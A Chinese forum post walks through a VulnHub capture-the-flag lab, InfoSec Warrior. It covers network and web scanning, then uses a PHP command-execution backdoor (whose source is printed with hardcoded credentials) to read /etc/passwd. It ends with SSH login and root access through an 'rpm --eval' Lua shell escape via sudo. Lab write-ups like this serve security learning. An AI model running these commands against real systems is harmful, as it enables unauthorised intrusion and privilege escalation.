Vulnhub之Infosec Warrior靶机详细测试过程(不同的思路)

慢吞云雾缓吐愁  金牌会员 | 2023-4-17 16:29:12 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 946|帖子 946|积分 2838

Infosec Warrior

作者: jason huawen
靶机信息

名称:InfoSecWarrior CTF 2020: 01
地址:
  1. https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/
复制代码
识别目标主机IP地址
  1. ─(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
  3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
  5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
  6. _____________________________________________________________________________
  7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  8. -----------------------------------------------------------------------------
  9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
  10. 192.168.56.100  08:00:27:9f:b1:40      1      60  PCS Systemtechnik GmbH                                                   
  11. 192.168.56.253  08:00:27:e6:d8:5f      1      60  PCS Systemtechnik GmbH   
复制代码
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 00:37 EDT
  4. Nmap scan report for bogon (192.168.56.253)
  5. Host is up (0.00040s latency).
  6. Not shown: 65351 filtered tcp ports (no-response), 182 filtered tcp ports (host-prohibited)
  7. PORT   STATE SERVICE VERSION
  8. 22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
  9. | ssh-hostkey:
  10. |   1024 2fb3a5cde51433a1823bdd5a5ed75936 (DSA)
  11. |_  2048 2db4152836d8b54e18818eaf3ee4dec1 (RSA)
  12. 80/tcp open  http    Apache httpd 2.2.15 ((CentOS))
  13. |_http-title: Apache HTTP Server Test Page powered by CentOS
  14. |_http-server-header: Apache/2.2.15 (CentOS)
  15. | http-methods:
  16. |_  Potentially risky methods: TRACE
  17. MAC Address: 08:00:27:E6:D8:5F (Oracle VirtualBox virtual NIC)
  19. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  20. Nmap done: 1 IP address (1 host up) scanned in 186.97 seconds
复制代码
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(HTTP)
获得Shell
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ curl http://192.168.56.253/robots.txt                    
  3. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  4. <html><head>
  5. <title>404 Not Found</title>
  6. </head><body>
  7. <h1>Not Found</h1>
  8. <p>The requested URL /robots.txt was not found on this server.</p>
  9. <hr>
  10. <address>Apache/2.2.15 (CentOS) Server at 192.168.56.253 Port 80</address>
  11. </body></html>
  13. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  14. └─$ nikto -h http://192.168.56.253                                 
  15. - Nikto v2.1.6
  16. ---------------------------------------------------------------------------
  17. + Target IP:          192.168.56.253
  18. + Target Hostname:    192.168.56.253
  19. + Target Port:        80
  20. + Start Time:         2023-04-17 00:42:27 (GMT-4)
  21. ---------------------------------------------------------------------------
  22. + Server: Apache/2.2.15 (CentOS)
  23. + The anti-clickjacking X-Frame-Options header is not present.
  24. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  25. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  26. + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  27. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
  28. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  29. + Server may leak inodes via ETags, header found with file /sitemap.xml, inode: 264859, size: 292, mtime: Thu Feb 13 06:51:21 2020
  30. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  31. + OSVDB-3268: /icons/: Directory indexing found.
  32. + OSVDB-3233: /icons/README: Apache default file found.
  33. + 8724 requests: 0 error(s) and 10 item(s) reported on remote host
  34. + End Time:           2023-04-17 00:42:45 (GMT-4) (18 seconds)
  35. --------------------------------------------------------------------------
复制代码
接下里看能否扫码出目录或者文件?
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ curl http://192.168.56.253/note.txt                     
  3. Note Form Developer Team
  4. 1. Try Harder
  5. 2. Enumeration is the key
  7. Ping Us on  @armourinfosec @MAALP1225 @CyberKnight00
复制代码
cmd.php文件被重定向到外网的网站。
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ curl http://192.168.56.253/wordpress/
  3. <!DOCTYPE html>
  4. <html xmlns="http://www.w3.org/1999/xhtml">
  5. <head>
  6. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  7.         <title>Database Error</title>
  9. </head>
  10. <body>
  11.         <h1>Error establishing a database connection</h1>
  12. </body>
  13. </html>
复制代码
但是cmd.php看上去就是有命令执行,因此FUZZ一下
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ wfuzz -c -u 'http://192.168.56.253/cmd.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
  3. /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
  4. ********************************************************
  5. * Wfuzz 3.1.0 - The Web Fuzzer                         *
  6. ********************************************************
  8. Target: http://192.168.56.253/cmd.php?FUZZ=id
  9. Total requests: 220560
  11. =====================================================================
  12. ID           Response   Lines    Word       Chars       Payload                                                      
  13. =====================================================================
  15. 000007399:   200        0 L      10 W       58 Ch       "AI"        
复制代码
FUZZ出参数名称为AI ,访问却返回:
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ curl http://192.168.56.253/cmd.php?AI=id
  3. Now the main part what it is loooooool<br>Try other method                                                                                                                              
复制代码
是不是需要利用burpsuite拦截请求,将方法修改为POST
<img alt="" loading="lazy">
结果返回了:
  1. ou Found ME : - (
  3. uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
复制代码
那接下来就看获得Shell了
测试了一下,不存在nc命令
可以读取到/etc/passw文件:
  1. root:x:0:0:root:/root:/bin/bash
  2. bin:x:1:1:bin:/bin:/sbin/nologin
  3. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  4. adm:x:3:4:adm:/var/adm:/sbin/nologin
  5. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  6. sync:x:5:0:sync:/sbin:/bin/sync
  7. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  8. halt:x:7:0:halt:/sbin:/sbin/halt
  9. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  10. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  11. operator:x:11:0:operator:/root:/sbin/nologin
  12. games:x:12:100:games:/usr/games:/sbin/nologin
  13. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  14. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  15. nobody:x:99:99:Nobody:/:/sbin/nologin
  16. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  17. saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
  18. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  19. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  20. apache:x:48:48:Apache:/var/www:/sbin/nologin
  21. isw0:x:500:500::/home/isw0:/bin/bash
  22. isw1:x:501:501::/home/isw1:/home/isw1/bash
  23. isw2:x:502:502::/home/isw2:/bin/bash
  24. dbus:x:81:81:System message bus:/:/sbin/nologin
  25. avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
复制代码
通过构造命令ls -alh /var/www/html,可以得到
  1. total 424K
  2. drwxr-xr-x. 3 root   root   4.0K Feb 17  2020 .
  3. drwxr-xr-x. 6 root   root   4.0K Feb 12  2020 ..
  4. -rw-r--r--. 1 root   root    440 Feb 17  2020 cmd.php
  5. -rw-r--r--. 1 root   root   303K Feb 13  2020 hacker.gif
  6. -rw-r--r--. 1 root   root    366 Feb 13  2020 index.htnl
  7. -rw-r--r--. 1 root   root    92K Feb 13  2020 minnions.gif
  8. -rw-r--r--. 1 root   root    120 Feb 17  2020 note.txt
  9. -rw-r--r--. 1 root   root    292 Feb 13  2020 sitemap.xml
  10. drwxr-xr-x. 5 apache apache 4.0K Feb 13  2020 wordpress
复制代码
通过构造命令: cat cmd.php,可以得到文件内容:
  1. ";
  3. echo "Try other method";
  4.         die;
  5. }
  7. if(isset($_POST['AI'])){
  8.         echo "You Found ME : - (";
  9.     echo "
  11. ";
  12.         $cmd = ($_POST['AI']);
  13.         system($cmd);
  14.         echo "
  16. ";
  17.         die;
  18. }
  19. else {
  21. header("Location: https://www.armourinfosec.com/category/information-gathering/");
  22. }
  24. $user="isw0";
  25. $pass="123456789blabla";
  27. ?>
复制代码
这里包含了用户名和口令,其实花了各种反弹shell的命令都没能成功,对信息的收集很重要
  1. ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
  2. └─$ ssh isw0@192.168.56.253 -oHostKeyAlgorithms=+ssh-dss           
  3. The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
  4. DSA key fingerprint is SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
  5. This host key is known by the following other names/addresses:
  6.     ~/.ssh/known_hosts:53: [hashed name]
  7. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  8. Warning: Permanently added '192.168.56.253' (DSA) to the list of known hosts.
  9. isw0@192.168.56.253's password:
  10. Last login: Mon Feb 17 13:56:07 2020 from 192.168.56.1
  11. [isw0@InfosecWarrior ~]$ id
  12. uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
  13. [isw0@InfosecWarrior ~]$
复制代码
  1. [isw0@InfosecWarrior ~]$ cat isw0_user
  2. e4408105ca9c2a5c2714a818c475d06e
复制代码
提权
  1. isw0@InfosecWarrior wordpress]$ sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'
  2. [sudo] password for isw0:
  3. sh-4.1# cd /root
  4. sh-4.1# ls -alh
  5. total 56K
  6. dr-xr-x---.  2 root root 4.0K Feb 14  2020 .
  7. dr-xr-xr-x. 21 root root 4.0K Apr 17 10:05 ..
  8. -rw-------.  1 root root 1.1K Feb 12  2020 anaconda-ks.cfg
  9. -rwx------.  1 root root   65 Feb 14  2020 Armour.sh
  10. lrwxrwxrwx.  1 root root    9 Feb 12  2020 .bash_history -> /dev/null
  11. -rw-r--r--.  1 root root   18 May 20  2009 .bash_logout
  12. -rw-r--r--.  1 root root  176 May 20  2009 .bash_profile
  13. -rw-r--r--.  1 root root  176 Sep 23  2004 .bashrc
  14. -rw-r--r--.  1 root root  100 Sep 23  2004 .cshrc
  15. ----------.  1 root root   33 Feb 13  2020 flag.txt
  16. -rw-r--r--.  1 root root 8.3K Feb 12  2020 install.log
  17. -rw-r--r--.  1 root root 3.4K Feb 12  2020 install.log.syslog
  18. -rw-r--r--.  1 root root  129 Dec  4  2004 .tcshrc
  19. sh-4.1# cat flag.txt
  20. fc9c6eb6265921315e7c70aebd22af7e
  21. sh-4.1#
复制代码
至此提权成功。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

慢吞云雾缓吐愁

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表